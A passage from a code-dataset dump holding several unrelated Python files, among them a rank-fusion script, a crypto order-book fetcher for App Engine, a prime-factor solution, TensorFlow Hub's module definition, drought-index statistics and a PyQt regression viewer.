- min_score) / scorediff\n docs[row.document_id].append(row.score)\n\n for document, mnzs in docs.items():\n scores[document] = sum(mnzs) * len(mnzs)\n\n return sorted(scores.items(), key=lambda x: x[1], reverse=True)\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--systems', dest='systems', nargs='+', help='trec file for each system you are combining')\n args = parser.parse_args()\n\n scores = [read_trec(system) for system in tqdm(args.systems)]\n combined = combine(scores, combmnz_query)\n\n print(write_trec(combined))\n","sub_path":"clcomb/combination/combmnz.py","file_name":"combmnz.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"183779352","text":"import random\n\ncards = ['card 1', 'card 2', 'card 3', 'card 4', 'card 5', 'card 6', 'card 7', 'card 8',]\ncards_selected = []\n\ncard = 'card 2'\nspecial_card = 'special card'\n\n\ndef random_select():\n\tcard = random.choice(cards)\n\tprint(card)\n\n\n\ndef add_to_selected():\n\tcards_selected.append(card)\n\tprint(cards_selected)\n\n\ndef check_if_in_list():\n\tif card in cards_selected:\n\t\tprint('card already selected')\n#\t\treturn False\n\telse:\n\t\tprint('its a new card')\n#\t\treturn True\n\n\n\ndef compare_lists():\n\tcompared = set(cards) & set(cards_selected)\n\tprint(compared)\n\n\ndef list_length():\n\tlt_len = len(cards_selected)\n\tprint(lt_len)\n\n\ndef check_turns():\n\tlt_len = len(cards_selected)\n\t\n\tif lt_len == 6:\n\t\tcards.append(special_card)\n\n\n\n\nrandom_select()\n\nadd_to_selected()\n\ncheck_if_in_list()\n\ncompare_lists()\n\nlist_length()\n\ncheck_turns()\n\nprint(cards_selected)","sub_path":"rpg-boardgame/cards_test.py","file_name":"cards_test.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"110983700","text":"import webapp2\nimport logging\nimport json\nimport requests\nimport sys\nimport traceback\nfrom bittrex.bittrex import Bittrex\n\nfrom google.appengine.ext import ndb\n\n\n# Model: Order Book\nclass OrderBook(ndb.Model):\n OrderbookJson = ndb.JsonProperty(compressed=True)\n RetrievedAt = ndb.DateTimeProperty(auto_now_add=True)\n AssetId1 = ndb.StringProperty()\n AssetId2 = ndb.StringProperty()\n\n# Model: Waves Pairing\nclass WavesMarketConfig(ndb.Model):\n AssetId1 = ndb.StringProperty()\n AssetId2 = ndb.StringProperty()\n\n#\n# Order book\n#\nclass testOrderbook(webapp2.RequestHandler):\n def get(self):\n\n # Get the Bittrex Order book\n # self.response.write(json.dumps(getBittrexOrderBook(marketPair='BTC-LTC', orderType=\"both\")))\n self.response.write(json.dumps(getBittrexOrderBookHistory(marketPair='BTC-LTC')))\n\n # Create some pairings in the DB\n createPairings()\n\n # Specify some headers for proper API call\n self.response.headers['Content-Type'] = 'application/json'\n\n # Get the results from the Wave pairings data entity\n db_results = WavesMarketConfig.query()\n\n # Iterate through the pairings and call Waves API to get data about them\n for db_result in db_results:\n\n payload = {\"asset2\": db_result.AssetId2, \"asset1\": db_result.AssetId1}\n url = \"http://ec2-34-217-82-62.us-west-2.compute.amazonaws.com:3000/api/waves/assetpairs/all\"\n\n headers = {'content-type': 'application/json'}\n logging.info(\"sending pywaves test:\")\n logging.info(payload)\n\n # Let's try running the API call to see if we get a response\n try:\n resp = requests.post(url, data=json.dumps(payload), headers=headers)\n\n # Create an entity object for storing the data\n ent = OrderBook(OrderbookJson=json.loads(resp.text), AssetId1=db_result.AssetId1, AssetId2=db_result.AssetId2)\n\n # Shove that data into a datastore and get the key that gets returned\n key = ent.put()\n\n # Print out the response via text\n self.response.write(resp.text)\n\n # Throw exception if things fail\n except Exception as inst:\n self.response.write(\"Request Failed. \" + \"{0}\".format(sys.exc_info()[0]) + \" {0}\".format(traceback.format_exc()))\n\n#\ndef createPairings():\n db_results = WavesMarketConfig.query()\n\n if db_results.get() == None:\n ent = WavesMarketConfig(AssetId1='474jTeYx2r2Va35794tCScAXWJG9hU2HcgxzMowaZUnu', AssetId2='8LQW8f7P5d5PZM7GtZEBgaqRPGSzS3DfPuiXrURJ4AJS')\n ent.put()\n\n\n# Get the Bittrex order book for a specific Pairing\ndef getBittrexOrderBook(marketPair, orderType):\n\n my_bittrex = Bittrex(None, None) # or defaulting to v1.1 as Bittrex(None, None)\n return my_bittrex.get_orderbook(marketPair, orderType)\n\n\n# Get the Bittrex order book history for a specific Pairing\ndef getBittrexOrderBookHistory(marketPair):\n\n my_bittrex = Bittrex(None, None) # or defaulting to v1.1 as Bittrex(None, None)\n return my_bittrex.get_market_history(marketPair)\n\n\n\n\n\napp = webapp2.WSGIApplication([\n ('/cron/orderbook', testOrderbook),\n], debug=True)\n\n\n","sub_path":"orderbook.py","file_name":"orderbook.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"310795554","text":"#import pdb ; pdb.set_trace()\n\n\n\ndef isPrime(n):\n if(n==2): return True\n if(n==3): return True\n if(n==5): return True\n \n sqrtN = int(n**0.5)\n for i in range(2,sqrtN):\n if ((n%i)==0):\n return False\n return True\n\ndef getNextPrime(primeFactorTab):\n\n if len(primeFactorTab)==0:\n primeFactorTab.append(2)\n return\n\n elem = primeFactorTab[len(primeFactorTab)-1]\n \n current = elem + 1\n isPrim = True\n while True:\n for prime in primeFactorTab:\n\n if prime > int(current**0.5):\n break\n\n if current%prime == 0:\n current+=1\n isPrim=False\n break\n\n if isPrim :\n primeFactorTab.append(current)\n return\n isPrim = True\n\nprimeFactorTab=[]\ndivisorsTab=[]\nfactor=1\n\ncstValue=600851475143\nvalue=cstValue\ni=0\n\nwhile factor < cstValue:\n getNextPrime(primeFactorTab)\n prime=primeFactorTab[i]\n \n while value%prime==0:\n factor=factor*prime\n divisorsTab.append(prime)\n value=value/prime\n \n i+=1\n\nprint(\"Prime factor decomposition :\"+str(divisorsTab) )\n\n","sub_path":"ProjectEuler/Problem_3/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"420908844","text":"# Copyright 2018 The TensorFlow Hub Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"TensorFlow Hub Module definition.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport six\nimport tensorflow as tf\nfrom tensorflow_hub import module_spec\nfrom tensorflow_hub import registry\nfrom tensorflow_hub import tensor_info\n\n\ndef as_module_spec(spec):\n if isinstance(spec, module_spec.ModuleSpec):\n return spec\n elif isinstance(spec, six.string_types):\n return load_module_spec(spec)\n else:\n raise ValueError(\"Unknown module spec type: %r\" % type(spec))\n\n\ndef load_module_spec(path):\n \"\"\"Loads a ModuleSpec from the filesystem.\n\n Args:\n path: string describing the location of a module. There are several\n supported path encoding schemes:\n a) URL location specifying an archived module\n (e.g. http://domain/module.tgz)\n b) Any filesystem location of a module directory (e.g. /module_dir\n for a local filesystem). All filesystems implementations provided\n by Tensorflow are supported.\n\n Returns:\n A ModuleSpec.\n\n Raises:\n ValueError: on unexpected values in the module spec.\n tf.OpError: on file handling exceptions.\n \"\"\"\n path = registry.resolver(path)\n return registry.loader(path)\n\n\ndef export_module_spec(spec, path, checkpoint_path, name_transform_fn):\n \"\"\"Helper function to ModuleSpec.export().\"\"\"\n with tf.Graph().as_default():\n m = Module(spec)\n assign_map = {\n name_transform_fn(name): value for name, value in m.variable_map.items()\n }\n tf.train.init_from_checkpoint(checkpoint_path, assign_map)\n init_op = tf.initializers.global_variables()\n with tf.Session() as session:\n session.run(init_op)\n m.export(path, session)\n\n\n# Module class provides a unified access to all ModuleSpecs implementations and\n# should not contain specific implementation code in it (e.g. SavedModel code).\nclass Module(object):\n \"\"\"Part of a TensorFlow model that can be transferred between models.\n\n A Module represents a part of a TensorFlow graph that can be exported to disk\n (based on the SavedModel format) and later re-loaded. A Module has a defined\n interface that allows it to be used in a replaceable way, with little or no\n knowledge of its internals and its serialization format. Example:\n\n ```python\n m = hub.Module(\"/tmp/text-embedding\")\n embeddings = m(sentences)\n ```\n\n The module to instantiate is defined by its spec (a `ModuleSpec` or a\n path where to load it from) which contains the module weights, assets and\n signatures.\n\n During instantiation the Module adds the state (e.g. variables and tables ops)\n to the current graph. Afterwards, the method `__call__()` allows to apply the\n module `signatures` multiple times, which adds ops for the computation.\n\n A Module may provide different variants of its graph for different purposes\n (say, training or serving, which may behave differently, e.g., for batch\n normalization). Graph variants are identified by sets of string-valued tags.\n The graph variant used to create a module that is exported must define all the\n variables needed by any other graph variant that is subsequently used.\n\n To make it possible to easily replace a module with another, they all assume\n that they will be used with common TensorFlow conventions such as session\n initialization and restore, use of collections for variables, regularization\n losses and updates, etc.\n \"\"\"\n\n def __init__(self, spec, trainable=False, name=\"module\", tags=None):\n \"\"\"Constructs a Module to be used in the current graph.\n\n This creates the module `state-graph` under an unused variable_scope based\n on `name`. During this call a Module will:\n\n - Add GLOBAL_VARIABLES under its scope. Those variables may be added to\n to the TRAINABLE_VARIABLES collection (depending on `trainable` parameter)\n and to the MODEL_VARIABLES. The variables must be initialized before use,\n and can be checkpointed as usual.\n\n - Add ops to the INIT_TABLE_OPS collection, which must be run during session\n initialization and add constant tensors to ASSET_FILEPATHS that are\n needed during the execution of such ops.\n\n - Add tensors to the REGULARIZATION_LOSSES collection (depending on\n `trainable` parameter).\n\n Args:\n spec: A ModuleSpec defining the Module to instantiate or a path where\n to load a ModuleSpec from via `load_module_spec`.\n trainable: whether the Module is trainable. If False, no variables are\n added to TRAINABLE_VARIABLES collection, and no tensors are added to\n REGULARIZATION_LOSSES collection.\n name: A string, the variable scope name under which to create the Module.\n It will be uniquified and the equivalent name scope must be unused.\n tags: A set of strings specifying the graph variant to use.\n\n Raises:\n RuntimeError: explaning the reason why it failed to instantiate the\n Module.\n ValueError: if the requested graph variant does not exists.\n \"\"\"\n self._graph = tf.get_default_graph()\n self._spec = as_module_spec(spec)\n self._trainable = trainable\n\n self._tags = set(tags or [])\n if self._tags not in self._spec.get_tags():\n tags = sorted(list(tags)) if tags else tags\n raise ValueError(\"No such graph variant: tags=%r\" % tags)\n\n abs_state_scope = _try_get_state_scope(name, mark_name_scope_used=False)\n self._name = abs_state_scope.split(\"/\")[-2]\n\n abs_parent_scope = abs_state_scope.split(\"/\")[:-2]\n if abs_parent_scope:\n abs_parent_scope = \"/\".join(abs_parent_scope) + \"/\"\n else:\n abs_parent_scope = \"\"\n\n with tf.name_scope(abs_parent_scope):\n # pylint: disable=protected-access\n self._impl = self._spec._create_impl(\n name=self._name,\n trainable=self._trainable,\n tags=self._tags)\n # pylint: enable=protected-access\n\n def __call__(self, inputs=None, # pylint: disable=invalid-name\n _sentinel=None, signature=None, as_dict=None):\n \"\"\"Instantiates a module signature in the graph.\n\n Example calls:\n\n ```python\n # Use default signature with one input and default output.\n embeddings = m([\"hello world\", \"good morning\"])\n\n # Use \"encode\" signature with one input and default output.\n encodings = m([\"hello world\"], signature=\"encode\")\n\n # Use default signature with input dict and output dict.\n dict_outputs = m({\"text\": [...], \"lang\": [...]}, as_dict=True)\n ```\n\n The method __call__() allows to create the graph ops that compute a\n signature outputs given the inputs and using this module instance state.\n Each signature can be applied multiple times with different inputs and they\n all share the same module state.\n\n A Module may define multiple signatures. Use `signature=` to identify\n the specific signature to instantiate. If omitted or None, the default\n signature is used.\n\n A signature may define various outputs. Use `as_dict=True` to return a dict\n of all outputs. If omitted or False, the output named 'default' is\n returned.\n\n During this call a Module will:\n\n - Add ops in the current name scope to convert the inputs in tensors to feed\n to the signature.\n\n - Add ops to the UPDATE_OPS collection which depend on at least one of the\n provided inputs if the Module was constructed with `trainable=True`.\n\n - Add constant tensors to ASSET_FILEPATHS, even if those are not needed\n directly needed for the signature.\n\n Args:\n inputs: Inputs to the signature. A dict from input names to tensor\n values. If the signature only expects one input, one may pass\n a single value. If the signature has no inputs, it may be omitted.\n _sentinel: Used to prevent positional parameters besides `inputs`.\n signature: A string with the signature name to apply. If none, the\n default signature is used.\n as_dict: A boolean indicating whether to the return all the outputs\n of the signature as a dict or return only the default output.\n\n Returns:\n A tensor (single or sparse) if the signature defines a default output or\n a dict from strings (output names) to tensors if `as_dict=True` is used.\n\n Raises:\n TypeError: If there is a mismatch on arguments, inputs or outputs of\n the module signature.\n RuntimeError: If there are errors during creation of the signature graph.\n \"\"\"\n if self._graph is not tf.get_default_graph():\n raise RuntimeError(\n \"Module must be applied in the graph it was instantiated for.\")\n\n signature = self._impl.get_signature_name(signature)\n # SavedModel non-default signatures automatically includes ':' in them,\n # but that is an invalid character for a name that is used as part\n # of variable scopes.\n safe_signature = signature.replace(\":\", \"_\")\n name = \"%s_apply_%s\" % (self._name, safe_signature)\n\n dict_inputs = _prepare_dict_inputs(\n inputs, self._spec.get_input_info_dict(signature=signature,\n tags=self._tags))\n\n dict_outputs = self._impl.create_apply_graph(\n signature=signature,\n inputs=dict_inputs,\n name=name)\n return _prepare_outputs(dict_outputs, as_dict=as_dict)\n\n def get_signature_names(self):\n \"\"\"Returns the module's signature names as an iterable of strings.\"\"\"\n return self._spec.get_signature_names(tags=self._tags)\n\n def get_input_info_dict(self, signature=None):\n \"\"\"Describes the inputs required by a signature.\n\n Args:\n signature: A string with the signature to get inputs information for.\n If None, the default signature is used if defined.\n\n Returns:\n The result of ModuleSpec.get_input_info_dict() for the given signature,\n and the graph variant selected by `tags` when this Module was initialized.\n\n Raises:\n KeyError: if there is no such signature.\n \"\"\"\n return self._spec.get_input_info_dict(signature=signature, tags=self._tags)\n\n def get_output_info_dict(self, signature=None):\n \"\"\"Describes the outputs provided by a signature.\n\n Args:\n signature: A string with the signature to get ouputs information for.\n If None, the default signature is used if defined.\n\n Returns:\n The result of ModuleSpec.get_input_info_dict() for the given signature,\n and the graph variant selected by `tags` when this Module was initialized.\n\n Raises:\n KeyError: if there is no such signature.\n \"\"\"\n return self._spec.get_output_info_dict(signature=signature, tags=self._tags)\n\n def get_attached_message(self, key, message_type, required=False):\n \"\"\"Calls ModuleSpec.get_attached_message(); see there for more.\"\"\"\n return self._spec.get_attached_message(key, message_type,\n tags=self._tags, required=required)\n\n def export(self, path, session):\n \"\"\"Exports the module with the variables from the session in `path`.\n\n Note that it is the module definition in the ModuleSpec used to create this\n module that gets exported. The session is only used to provide the value\n of variables.\n\n Args:\n path: path where to export the module to.\n session: session where to export the variables from.\n\n Raises:\n RuntimeError: if there is an issue during the export.\n \"\"\"\n if self._graph is not tf.get_default_graph():\n raise RuntimeError(\"default graph differs from the graph where the \"\n \"module was instantiated.\")\n if self._graph is not session.graph:\n raise RuntimeError(\"session graph differs from the graph where the \"\n \"module was instantiated.\")\n self._impl.export(path, session)\n\n @property\n def variable_map(self):\n \"\"\"Map from original variable names into tf.Variables (or lists of them).\n\n This map translates between variable names relative to the module and the\n corresponding Variable objects that have been created by instantiating it\n in the current graph (with the applicable scoping added). Each key in the\n map is a variable name as created by running the module's defining\n `module_fn` in the root scope of an empty graph. Each value in the map is\n a Variable object, or in case of partitioned variables a list of Variable\n objects.\n\n This property can be used with `tf.init_from_checkpoint` as `assignment_map`\n in order to restore a pre-trained checkpoint into a Module before calling\n `Module.export()`.\n\n Returns:\n A dict from the variable names in the Module to the instantiated\n tf.Variables or list of tf.Variables (if partitioned). The keys of this\n map are the same regardless of the scope of where the Module was\n instantiated.\n \"\"\"\n return self._impl.variable_map\n\n @property\n def variables(self):\n \"\"\"Returns the list of all tf.Variables created by module instantiation.\"\"\"\n result = []\n for _, value in sorted(self.variable_map.items()):\n if isinstance(value, list):\n result.extend(value)\n else:\n result.append(value)\n return result\n\n\ndef _try_get_state_scope(name, mark_name_scope_used=True):\n \"\"\"Returns a fresh variable/name scope for a module's state.\n\n In order to import a module into a given scope without major complications\n we require the scope to be empty. This function deals with deciding an unused\n scope where to define the module state. This is non trivial in cases where\n name_scope and variable_scopes are out of sync, e.g. tpus or re-entering\n scopes.\n\n Args:\n name: A string with the name of the module as supplied by the client.\n mark_name_scope_used: a boolean, indicating whether to mark the name\n scope of the returned value as used.\n\n Raises:\n RuntimeError: if the name scope of the freshly created variable scope is\n already used.\n \"\"\"\n tmp_scope_name = tf.get_variable_scope().name\n if tmp_scope_name:\n tmp_scope_name += \"/\"\n with tf.name_scope(tmp_scope_name):\n # Pick an unused variable scope.\n with tf.variable_scope(\n None, default_name=name, auxiliary_name_scope=False) as vs:\n abs_state_scope = vs.name + \"/\"\n # Verify that the name scope is available and mark it used if requested.\n graph = tf.get_default_graph()\n unique_name_scope = graph.unique_name(name, mark_name_scope_used) + \"/\"\n if unique_name_scope != abs_state_scope:\n raise RuntimeError(\n \"variable_scope %s was unused but the corresponding \"\n \"name_scope was already taken.\" % abs_state_scope)\n return abs_state_scope\n\n\ndef _prepare_dict_inputs(inputs, tensor_info_map):\n \"\"\"Converts from inputs into dict inputs.\n\n This handles:\n - converting of a single value into a dict with a single key\n if the signature only has one expected input.\n - converting all input values into tensors compatible with the\n expected input tensor (dtype, shape).\n - check sparse/non-sparse tensor types.\n - check that exactly the needed inputs are given: i.e. no extra\n args and no missing args.\n\n Args:\n inputs: inputs fed to Module.__call__().\n tensor_info_map: A map from string to `tensor_info.ParsedTensorInfo`\n describing the signature inputs.\n\n Returns:\n A dict of tensors to feed to the signature instantiation.\n\n Raises:\n TypeError: If it fails to convert the input values into a dict of tensors\n to feed to the signature instantiation.\n \"\"\"\n if inputs is None:\n dict_inputs = {}\n elif isinstance(inputs, dict):\n dict_inputs = inputs\n elif len(tensor_info_map) == 1:\n dict_inputs = {list(tensor_info_map.keys())[0]: inputs}\n elif not tensor_info_map:\n raise TypeError(\"Signature expects no inputs.\")\n else:\n raise TypeError(\"Signature expects multiple inputs. Use a dict.\")\n # Finally convert a dict of values into a dict of tensors.\n return tensor_info.make_compatible_dict(dict_inputs, tensor_info_map)\n\n\ndef _prepare_outputs(dict_outputs, as_dict):\n \"\"\"Converts from dict outputs into the return value of Module.__call__().\n\n Args:\n dict_outputs: A dict output from applying a signature.\n as_dict: A boolean indicating whether to return the outputs of the Module\n as a dict or return the output named 'default.\n\n Returns:\n A tensor with the output named 'default' or a dict of output tensors if\n `as_dict=True`.\n\n Raises:\n TypeError: If as_dict is False and there is no output named 'default'.\n \"\"\"\n if as_dict:\n return dict_outputs\n if \"default\" in dict_outputs:\n return dict_outputs[\"default\"]\n else:\n raise TypeError(\"There is no output named 'default'. Use as_dict=True.\")\n","sub_path":"tensorflow_hub/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":17370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"406205770","text":"import logging\nimport warnings\nimport pandas as pd\nimport numpy as np\nfrom scipy.signal import lfilter\n\nfrom lib_utils_system import convert_list2dict\n\n\ndef compute_norm_data(ws_filter, ws_moments, geo_mask=None):\n ws_norm = {}\n for ref_key, ref_filter in ws_filter.items():\n\n ws_norm[ref_key] = {}\n for ref_time, ref_values in ref_filter.items():\n ref_month = pd.Timestamp(ref_time).month\n\n ref_moment_mean = ws_moments[ref_key]['mean'][ref_month]\n ref_moment_std = ws_moments[ref_key]['std'][ref_month]\n\n ref_values = np.asarray(ref_values)\n ref_norm = (ref_values - ref_moment_mean) / ref_moment_std\n\n if geo_mask is not None:\n ref_norm = ref_norm * geo_mask\n\n ws_norm[ref_key][ref_month] = ref_norm\n\n return ws_norm\n\n\ndef compute_moments_data_gamma_distribution(filter_data, count_all, count_filtered,\n tag_gamma_k='k', tag_gamma_theta='theta',\n tag_gamma_count_ratio='count_ratio'):\n\n ws_moment = {}\n for filter_order, filter_dictionary, in filter_data.items():\n\n month_list = list(pd.DatetimeIndex(list(filter_dictionary.keys())).month)\n\n month_unique = list(set(month_list))\n ws_moment[filter_order] = {}\n\n var_list_k = []\n var_list_theta = []\n var_list_count_ratio = []\n for month_step in month_unique:\n month_idx = [i for i, x in enumerate(month_list) if x == month_step]\n\n var_data_list = []\n var_count_all_list = []\n var_count_filtered_list = []\n for idx_step in month_idx:\n var_data_tmp = list(filter_dictionary.values())[idx_step]\n var_count_all_tmp = list(count_all.values())[idx_step]\n var_count_filtered_tmp = list(count_filtered.values())[idx_step]\n var_data_list.append(var_data_tmp)\n var_count_all_list.append(var_count_all_tmp)\n var_count_filtered_list.append(var_count_filtered_tmp)\n\n var_data_array = np.array(var_data_list, dtype=float)\n var_count_all_array = np.array(var_count_all_list, dtype=float)\n var_count_filtered_array = np.array(var_count_filtered_list, dtype=float)\n\n var_data_mean = np.nanmean(var_data_array, axis=0, dtype=np.float32)\n var_data_variance = np.nanvar(var_data_array, axis=0, dtype=np.float32)\n var_count_all = np.nansum(var_count_all_array, axis=0, dtype=np.float32)\n var_count_filtered = np.nansum(var_count_filtered_array, axis=0, dtype=np.float32)\n\n var_count_ratio = var_count_filtered / var_count_all\n\n var_idx_selected = np.where(var_count_filtered < 0.2 * var_count_all)\n\n var_data_mean[var_idx_selected[0], var_idx_selected[1]] = np.nan\n var_data_variance[var_idx_selected[0], var_idx_selected[1]] = np.nan\n var_count_ratio[var_idx_selected[0], var_idx_selected[1]] = np.nan\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n var_data_k = (var_data_mean ** 2) / var_data_variance\n var_data_theta = var_data_variance / var_data_mean\n\n var_list_k.append(var_data_k)\n var_list_theta.append(var_data_theta)\n var_list_count_ratio.append(var_count_ratio)\n\n var_dict_k = convert_list2dict(month_unique, var_list_k)\n var_dict_theta = convert_list2dict(month_unique, var_list_theta)\n var_dict_count_ratio = convert_list2dict(month_unique, var_list_count_ratio)\n\n ws_moment[filter_order][tag_gamma_k] = var_dict_k\n ws_moment[filter_order][tag_gamma_theta] = var_dict_theta\n ws_moment[filter_order][tag_gamma_count_ratio] = var_dict_count_ratio\n\n return ws_moment\n\n\ndef filter_data(ws_data, field_capacity=None, wilting_point=None, index_name='sspi'):\n\n var_time_list = list(ws_data.keys())\n var_data_3d = np.array(list(ws_data.values()), dtype=float)\n\n ws_filter = {}\n\n if index_name == 'swdi':\n filter_order1_3d = var_data_3d\n if (field_capacity is not None) and (wilting_point is not None):\n filter_order1_3d = (filter_order1_3d - field_capacity) / (field_capacity - wilting_point)\n else:\n logging.error(' ===> Geographical data are null!')\n raise IOError('Some mandatory field are not defined')\n elif index_name == 'sspi':\n filter_order1_3d = var_data_3d\n else:\n logging.error(' ===> Filter index type is not available')\n raise NotImplemented('Filter type not implemented yet')\n\n filter_order1_list = filter_order1_3d.tolist()\n\n filter_order1_dict = convert_list2dict(var_time_list, filter_order1_list)\n ws_filter['month_1'] = filter_order1_dict\n\n filter_order2_3d = lfilter([1 / 2] * 2, 1, filter_order1_3d, axis=0)\n filter_order2_3d[0, :, :] = np.nan\n filter_order2_list = filter_order2_3d.tolist()\n filter_order2_dict = convert_list2dict(var_time_list, filter_order2_list)\n ws_filter['month_2'] = filter_order2_dict\n\n filter_order3_3d = lfilter([1 / 3] * 3, 1, filter_order1_3d, axis=0)\n filter_order3_3d[0:2, :, :] = np.nan\n filter_order3_list = filter_order3_3d.tolist()\n filter_order3_dict = convert_list2dict(var_time_list, filter_order3_list)\n ws_filter['month_3'] = filter_order3_dict\n\n filter_order6_3d = lfilter([1 / 6] * 6, 1, filter_order1_3d, axis=0)\n filter_order6_3d[0:5, :, :] = np.nan\n filter_order6_list = filter_order6_3d.tolist()\n filter_order6_dict = convert_list2dict(var_time_list, filter_order6_list)\n ws_filter['month_6'] = filter_order6_dict\n\n return ws_filter","sub_path":"apps/drought_index/sspi/lib_utils_statistics.py","file_name":"lib_utils_statistics.py","file_ext":"py","file_size_in_byte":5773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"357130769","text":"import matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport numpy as np\nimport os\nfrom skimage.transform import resize\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nimport pyqtgraph\nfrom scipy import stats\nimport pickle\n\nimport sys\n\nimport Regression_Utils\n\npyqtgraph.setConfigOptions(imageAxisOrder='row-major')\n\n\nclass coef_viewer(QWidget):\n\n def __init__(self, r2_map, regression_coefs, parent=None):\n super(coef_viewer, self).__init__(parent)\n\n # Setup Window\n self.setWindowTitle(\"Correlation_Coef_Viewer\")\n self.setGeometry(0, 0, 1900, 500)\n self.r2_map = r2_map\n self.regression_coefs = regression_coefs\n\n # Create R2 Map Display View\n self.r2_display_view_widget = QWidget()\n self.r2_display_view_widget_layout = QGridLayout()\n self.r2_display_view = pyqtgraph.ImageView()\n self.r2_display_view.ui.histogram.hide()\n self.r2_display_view.ui.roiBtn.hide()\n self.r2_display_view.ui.menuBtn.hide()\n self.r2_display_view_widget_layout.addWidget(self.r2_display_view, 0, 0)\n self.r2_display_view_widget.setLayout(self.r2_display_view_widget_layout)\n self.r2_display_view.setImage(self.r2_map)\n\n # Create Regression Coef Display View\n self.coef_display_view_widget = QWidget()\n self.coef_display_view_widget_layout = QGridLayout()\n self.coef_display_view = pyqtgraph.ImageView()\n self.coef_display_view.ui.histogram.hide()\n self.coef_display_view.ui.roiBtn.hide()\n self.coef_display_view.ui.menuBtn.hide()\n self.coef_display_view_widget_layout.addWidget(self.coef_display_view, 0, 0)\n self.coef_display_view_widget.setLayout(self.coef_display_view_widget_layout)\n\n self.r2_display_view.getView().scene().sigMouseMoved.connect(lambda pos: self.change_pixel(pos, self.r2_display_view))\n\n # Create Index Map\n indicies, image_height, image_width = Regression_Utils.load_tight_mask_downsized()\n index_map = np.zeros(image_height * image_width)\n index_map[indicies] = list(range(len(indicies)))\n self.index_map = np.reshape(index_map, (image_height, image_width))\n\n # Set Colourmap\n #colourmap = Regression_Utils.get_musall_cmap()\n colors = [ [0.00, 0.87, 0.90, 1.00],\n [0.00, 0.00, 1.00, 1.00],\n [0.00, 0.00, 0.00, 1.00],\n [1.00, 0.00, 0.00, 1.00],\n [1.00, 1.00, 0.00, 1.00]]\n colors = np.array(colors)\n print(\"Colour Shape\", np.shape(colors))\n colors = np.multiply(colors, 255)\n\n\n cmap = pyqtgraph.ColorMap(pos=np.linspace(0.0, 1.0, 5), color=colors)\n #cmap = pyqtgraph.colormap.getFromMatplotlib('hot')\n self.coef_display_view.setColorMap(cmap)\n\n self.layout = QGridLayout()\n self.layout.addWidget(self.coef_display_view_widget, 0, 0, 1, 1)\n self.layout.addWidget(self.r2_display_view_widget, 0, 1, 1, 1)\n self.setLayout(self.layout)\n\n def change_pixel(self, pos, imageview):\n pos = imageview.getImageItem().mapFromScene(pos)\n y = np.clip(int(pos.y()), a_min=0, a_max=100 - 1)\n x = np.clip(int(pos.x()), a_min=0, a_max=100 - 1)\n selected_pixel_index = int(self.index_map[y, x])\n regression_map = self.regression_coefs[selected_pixel_index]\n coef_magnitude = np.max(np.abs(regression_map))\n self.coef_display_view.setImage(regression_map)\n self.coef_display_view.setLevels([-coef_magnitude, coef_magnitude])\n\n\n\n\ndef load_downsampled_mask(base_directory):\n\n mask = np.load(os.path.join(base_directory, \"Generous_Mask.npy\"))\n\n # Transform Mask\n mask = resize(mask, (300, 304), preserve_range=True, order=0, anti_aliasing=True)\n\n image_height = np.shape(mask)[0]\n image_width = np.shape(mask)[1]\n\n mask = np.where(mask > 0.1, 1, 0)\n mask = mask.astype(int)\n flat_mask = np.ndarray.flatten(mask)\n indicies = np.argwhere(flat_mask)\n indicies = np.ndarray.astype(indicies, int)\n indicies = np.ndarray.flatten(indicies)\n\n return indicies, image_height, image_width\n\ndef load_smallest_mask(base_directory):\n\n indicies, image_height, image_width = load_downsampled_mask(base_directory)\n template = np.zeros(image_height * image_width)\n template[indicies] = 1\n template = np.reshape(template, (image_height, image_width))\n template = template[0:300, 0:300]\n template = resize(template, (100,100),preserve_range=True, order=0, anti_aliasing=True)\n template = np.reshape(template, 100 * 100)\n downsampled_indicies = np.nonzero(template)\n return downsampled_indicies, 100, 100\n\ndef reconstruct_r2_map(r2_values, base_directory):\n\n # Restructure Coef Matrix\n indicies, image_height, image_width = load_smallest_mask(base_directory)\n r2_map = Regression_Utils.create_image_from_data(r2_values, indicies, image_height, image_width)\n\n\n return r2_map\n\n\ndef reconstruct_coefs(regression_coefs):\n \n reconstructed_coefs = []\n for coef in regression_coefs:\n coef = np.reshape(coef, (480, 640))\n reconstructed_coefs.append(coef)\n \n regression_coefs = np.array(reconstructed_coefs)\n return regression_coefs\n\n\n\n\ndef visualise_svd_decomposition(components):\n\n for component in components:\n component = np.reshape(component, (480, 640))\n\n plt.imshow(component)\n plt.show()\n\n\n\n\nif __name__ == '__main__':\n\n app = QApplication(sys.argv)\n\n # Load Files\n base_directory = r\"/media/matthew/External_Harddrive_2/Widefield_Data_New_Pipeline/Control_Data/NRXN78.1D/2020_12_07_Switching_Imaging\"\n regression_coefs = np.load(os.path.join(base_directory, \"Mousecam_Analysis\", \"Whole_Video_Coefs.npy\"))\n r2_values = np.load(os.path.join(base_directory, \"Mousecam_Analysis\", \"Whole_Video_R2.npy\"))\n model = pickle.load(open(os.path.join(base_directory, \"Mousecam_Analysis\", \"SVD 